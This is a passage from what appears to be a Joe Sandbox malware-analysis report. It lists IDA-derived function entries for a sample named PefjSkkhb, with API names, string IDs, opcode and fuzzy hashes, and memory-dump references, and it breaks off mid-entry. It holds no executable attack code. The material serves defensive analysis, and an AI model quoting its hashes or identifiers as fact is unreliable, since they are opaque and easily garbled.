                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$CreateDestroyMessageObjectSendStock
                                                                                                                                                                                                                    • String ID: static
                                                                                                                                                                                                                    • API String ID: 3467290483-2160076837
                                                                                                                                                                                                                    • Opcode ID: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
                                                                                                                                                                                                                    • Instruction ID: 10d5fafe202d1b0f3855276befebe05f54458e9fc8e1a0e2c5665a0f5a68994e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 034159326086C2C6D6709F21E4407AEB7A0FB84790F144635EBEA57E99DF3DD481CB00
                                                                                                                                                                                                                    Function 00007FF656D45E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88networkCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWidehtonsinet_addr
                                                                                                                                                                                                                    • String ID: 255.255.255.255
                                                                                                                                                                                                                    • API String ID: 2496851823-2422070025
                                                                                                                                                                                                                    • Opcode ID: e55c8c587f1448b1a4207f66a752895f1a07630204b4ee05391494375fe3cc25
                                                                                                                                                                                                                    • Instruction ID: 97e451bf33232d997d804db50c59c392cd7b57a503ded4a91a53b36c012a947d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e55c8c587f1448b1a4207f66a752895f1a07630204b4ee05391494375fe3cc25
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3131BE62A0868281EB10CB26D85427D3760FB54BD5F498B32DE9ED33A5DEBED945C700
                                                                                                                                                                                                                    Function 00007FF656D403C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _snwprintf
                                                                                                                                                                                                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                                                                                                    • API String ID: 3988819677-2584243854
                                                                                                                                                                                                                    • Opcode ID: c7e08f6a60c99c5d777c2b71318a0fa50eea3cb020f88eb0f1ff8c1330ae95ab
                                                                                                                                                                                                                    • Instruction ID: f6ee64183693b68ae8b17d9371df9d4f1a9a396db08c7366003ee254399acbc5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c7e08f6a60c99c5d777c2b71318a0fa50eea3cb020f88eb0f1ff8c1330ae95ab
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A318CB6B08A4295EB10DB61E4541AC3371FB58B84F884632CE4EB7769CF7EE50AC340
                                                                                                                                                                                                                    Function 00007FF656D5B224 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$CreateMessageObjectSendStock
                                                                                                                                                                                                                    • String ID: $SysTabControl32
                                                                                                                                                                                                                    • API String ID: 2080134422-3143400907
                                                                                                                                                                                                                    • Opcode ID: bda9a96d7587ee0db61141e8122984108ce719646b8dc1b3190cd5c08410ff98
                                                                                                                                                                                                                    • Instruction ID: a80ebcad48d55dd75c672a83bfea5a974db6ef98e6a6909cbe6c503b59169aed
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bda9a96d7587ee0db61141e8122984108ce719646b8dc1b3190cd5c08410ff98
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C23159325087C18BE760CF15E44475AB7A0F785BA4F184335EAA867AE8CB39D481CF00
                                                                                                                                                                                                                    Function 00007FF656CEDC30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileHandleType
                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                    • API String ID: 3000768030-2766056989
                                                                                                                                                                                                                    • Opcode ID: 6504a464ad744481ce6bc1c71c4353ab51ac4f53e5ce451b4dcbbfd06c50b848
                                                                                                                                                                                                                    • Instruction ID: 24684e31a5b15a0e26868ca5fa82f5c3f14418aa8d7bb6cf4ced429958d023b9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6504a464ad744481ce6bc1c71c4353ab51ac4f53e5ce451b4dcbbfd06c50b848
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF21E1A2B08A4381EB659B2994911386771EB857B4F2C1335D6AFA73D4CE7AEC81D300
                                                                                                                                                                                                                    Function 00007FF656D5A0C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                    • String ID: static
                                                                                                                                                                                                                    • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                    • Opcode ID: 2cf77c951f50a5aa7b90eeaf8a6614b83960d367aa0043a5ee29e49d78538776
                                                                                                                                                                                                                    • Instruction ID: 6ea68e1fcb34d97ae49bb19ada37184196aeb3a4a3f7fcc3455722c590010efa
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2cf77c951f50a5aa7b90eeaf8a6614b83960d367aa0043a5ee29e49d78538776
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F311932A087818BD724CF29E444B5AB7A5F788790F144239EB9993B98DF39E855CF00
                                                                                                                                                                                                                    Function 00007FF656D59868 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                    • String ID: Combobox
                                                                                                                                                                                                                    • API String ID: 1025951953-2096851135
                                                                                                                                                                                                                    • Opcode ID: 64d9c3cb7b5de17515fad991fab36aed20c74e14fc7f9fd3c19d97b8fd4a0418
                                                                                                                                                                                                                    • Instruction ID: abae19fddcc8a28742c291aa5924f996515a39ccac3172348862bb260ab915d2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64d9c3cb7b5de17515fad991fab36aed20c74e14fc7f9fd3c19d97b8fd4a0418
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C03125326087C18AE7708F24E444B5AB7A1F799790F545339EAA897B99CF3DD881CF00
                                                                                                                                                                                                                    Function 00007FF656D59BD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                                                                                                                                                    • String ID: edit
                                                                                                                                                                                                                    • API String ID: 2978978980-2167791130
                                                                                                                                                                                                                    • Opcode ID: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
                                                                                                                                                                                                                    • Instruction ID: bf1a9abc37ce40ba9d2b50779d35d919da2bec65b86ee4194e6dc1bcc5ecd353
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2310736A087C18AE760CB15E44475AB7A1F789790F184735EAA897B98DF3DD881CF01
                                                                                                                                                                                                                    Function 00007FF656CEFD90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _handle_error
                                                                                                                                                                                                                    • String ID: "$pow
                                                                                                                                                                                                                    • API String ID: 1757819995-713443511
                                                                                                                                                                                                                    • Opcode ID: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
                                                                                                                                                                                                                    • Instruction ID: 68e28768882606879cb4b1e50ac1ad69ac9b4b39f705c46fe0ece3c219a2f7dc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45216EB2D18AC683E371CF10E04166AAAB0FBDA344F241325F29957A55DFBEE541DB40
                                                                                                                                                                                                                    Function 00007FF656D1DDF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClassMessageNameSend
                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                    • API String ID: 3678867486-1403004172
                                                                                                                                                                                                                    • Opcode ID: 97deb16edf8e784fc52f0d006fa99df0b5c043f3f1d7c65ec9baf9ca6ee38585
                                                                                                                                                                                                                    • Instruction ID: 02277f8a0e067806c12e4fff3004329bec7e6e068138cd0850ea9a19e2121b41
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97deb16edf8e784fc52f0d006fa99df0b5c043f3f1d7c65ec9baf9ca6ee38585
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7111E162A08B8181E610DB11D4400E967A1FB99BE0F884731DAEDD77EADF3DD606CB40
                                                                                                                                                                                                                    Function 00007FF656D1DD48 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClassMessageNameSend
                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                    • API String ID: 3678867486-1403004172
                                                                                                                                                                                                                    • Opcode ID: d39c91620d6c6e447856c574b1c807ce734865e57223a48666476f59d2f3e294
                                                                                                                                                                                                                    • Instruction ID: 8ed5bdf44185c93a92e028cb0008f7183d31db1a49bb246a235227fdef06d556
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d39c91620d6c6e447856c574b1c807ce734865e57223a48666476f59d2f3e294
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B511C462A08B8591EB10D710E0512F92760FFC97C0F8C4730EA8D97B9ADF6DD605CB00
                                                                                                                                                                                                                    Function 00007FF656D1DCA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClassMessageNameSend
                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                    • API String ID: 3678867486-1403004172
                                                                                                                                                                                                                    • Opcode ID: 2b6fed8ad632b1f274e203d646578af3038472905804e24f6343927dca18ccae
                                                                                                                                                                                                                    • Instruction ID: 972f192ece9725887372969db15932751e1c0eab0fbcb93424d44f3aa25fb901
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b6fed8ad632b1f274e203d646578af3038472905804e24f6343927dca18ccae
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C11C462B08A8191FB10DB10E0511FA6360FF897C0F8C4B31EA8D97B9ADF6DD605CB00
                                                                                                                                                                                                                    Function 00007FF656D3E708 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47networkCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Internet$OpenOption
                                                                                                                                                                                                                    • String ID: <local>
                                                                                                                                                                                                                    • API String ID: 942729171-4266983199
                                                                                                                                                                                                                    • Opcode ID: 8fc137a1ef2bd80f32763a254e30885bf035247cf28a45f4fd96fdfcbffecfa0
                                                                                                                                                                                                                    • Instruction ID: bf9c4a6babea434a6cbeb7212d025fa0eb38e38eb0e260cf3dd8ac5236a22c72
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8fc137a1ef2bd80f32763a254e30885bf035247cf28a45f4fd96fdfcbffecfa0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 91119876F1864182E7518B15E1047FD3261E780B88FA84736DA4D966D5DF3ED886C740
                                                                                                                                                                                                                    Function 00007FF656D5FEA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3712363035-3916222277
                                                                                                                                                                                                                    • Opcode ID: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
                                                                                                                                                                                                                    • Instruction ID: 517c137773bd76207965b53f72c5c80dad911762a8a18f5183e7ea03a6b57b64
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09112A72A0C7418AE7108F16F90426AB6A6FB94784F495735EA89D7E64CF3EE090CB04
                                                                                                                                                                                                                    Function 00007FF656D1DEA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClassMessageNameSend
                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                    • API String ID: 3678867486-1403004172
                                                                                                                                                                                                                    • Opcode ID: 2fa39eb79566fbbf5ef709d97066772d08e715fc924eaba82c6fe28b878daa18
                                                                                                                                                                                                                    • Instruction ID: 44ca6561462622966d3845589d7010a18cc129a102c5f8c55d36625a9110cb5d
